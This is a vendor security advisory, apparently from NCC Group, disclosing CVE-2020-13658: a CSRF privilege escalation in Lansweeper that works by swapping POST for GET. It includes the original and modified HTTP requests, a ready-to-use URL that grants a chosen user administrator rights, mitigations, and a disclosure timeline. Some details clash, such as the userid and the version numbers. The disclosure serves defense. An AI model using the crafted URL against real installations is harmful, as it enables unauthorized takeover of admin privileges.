Technical Advisory – Lansweeper Privilege Escalation via CSRF Using HTTP Method Interchange (CVE-2020-13658)
Vendor: Lansweeper Software Vendor URL: https://www.lansweeper.com/ Versions affected: 18.104.22.168 known affected versions, others likely Systems Affected: Windows 10 Authors: Joshua Dow <email@example.com>, Daniel King <firstname.lastname@example.org> Advisory URL / CVE Identifier: CVE-2020-13658 Risk: High
Lansweeper is an application that gathers hardware and software information of computers and other devices on a computer network for management and compliance and audit purposes. The application also encompasses a ticket based help desk system and capabilities for software updates on target devices.
An attacker with an existing user account can elevate their privileges within the Lansweeper application.
Lansweeper allows an administrator to change the roles and permissions granted to a given application user via the
/configuration/HelpdeskUsers/HelpdeskusersActions.aspx page. Normal usage of the application sends a POST request similar to the following when a user’s role is changed.
POST /configuration/HelpdeskUsers/HelpdeskusersActions.aspx HTTP/1.1 Host: [LANSWEEPER_URL] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[LANSWEEPER_URL]/configuration/HelpdeskUsers/ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 64 Connection: close Cookie: ASP.NET_SessionId=0cz3z0ocopzt04ddvo5514fo; UserSettings=language=1; custauth=username=admin userdomain=admin userid=4 originalvalue= permissionselect=2 action=SELECTtblusers
The application also protects its session cookie (
ASP.NET_SessionId) with the
samesite=lax parameter. This prevents several instances of traditional CSRF attacks (such as resources being loaded from image tags, or forms sending POST requests from an alternate domain).
An attacker can bypass these protections by modifying the previous request to use the
GET HTTP method instead of the
POST HTTP method and changing parameters specified in the POST body to URL parameters instead. Doing so results in the following:
GET /configuration/HelpdeskUsers/HelpdeskusersActions.aspx?userid=4 originalvalue= permissionselect=1 action=SELECTtblusers HTTP/1.1 Host: [LANSWEEPER_URL] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[LANSWEEPER_URL]/configuration/HelpdeskUsers/ X-Requested-With: XMLHttpRequest Connection: close Cookie: ASP.NET_SessionId=cpa4aol20zham0xmmcjxjl2e; UserSettings=language=1; custauth=username=admin userdomain=admin
Which can be shorted to the following URL:
http://[LANSWEEPER_URL]/configuration/HelpdeskUsers/HelpdeskusersActions.aspx?userid=4 originalvalue= permissionselect=1 action=SELECTtblusers
If a Lansweeper administrator browses to the above URL while authenticated to the Lansweeper application, the user specified in the
userid parameter will have their privileges set to those specified in the
permissionselect parameter. In this case the user with the
userid 2 has their permission set to “Administrator + Agent”.
- Update to the latest version of Lansweeper, which at the time of writing is 22.214.171.124
- Restrict access to the Lansweeper management console as much as possible. Ideally limiting access to only a small set of highly-trusted users.
- If possible, use a separate browser whose only purpose is accessing and managing the Lansweeper application.
- May 14th, 2020 – NCC Group reached out to Lansweeper to identify appropriate security contact.
- May 19th, 2020 – Lansweeper opens a case with their development team to look into the issue.
- May 28th, 2020 – NCC Group registers the associated CVE.
- May 28th, 2020 – NCC Group follows up with Lansweeper, and provides them with reserved CVE number.
- June 8th, 2020 – Lansweeper formally acknowledges the vulnerability but says a patch will take time, and notes a beta version can be provided by July 17th 2020.
- July 13th, 2020 – Lansweeper provides NCC Group with a beta version of their product with their initial fix.
- July 14th, 2020 – Lansweeper provides NCC group with a license to use the beta product.
- July 21st, 2020 – NCC Group investigates the fix and notifies Lansweeper that the CSRF protections implemented are fragile and only protect one endpoint.
- July 30th, 2020 – Lansweeper replies stating that NCC Group’s feedback on the patch was received and forwarded to the development team.
- August 13th, 2020 – Lansweeper publishes their patch notes.
- September 4th, 2020 – NCC Group reaches out to Lansweeper to confirm if feedback on the patch was received and is being incorporated. Lansweeper informs NCC Group that they have agreed internally to incorporate feedback into a new patch targeting September 18th and requests that the advisory be postponed to accommodate. NCC Group agrees.
- September 15th, 2020 – NCC Group reaches back out to Lansweeper to see if the updated patch is still expected to be ready to go on September 18th.
- September 18th, 2020 – Lansweeper shows NCC Group some of the changes being incorporated into the patch and explains that it is not ready for public push yet.
- September 18th, 2020 – NCC Group proposes to delay vulnerability publication until September 25th.
- September 22nd, 2020 – Lansweeper agrees to publication of the vulnerability on September 25th.
- September 25th, 2020 – Advisory published
The security team at Lansweeper, Inc.
About NCC Group:
NCC Group is a global expert in cyber security and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape.
With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate and respond to the risks they face.
We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.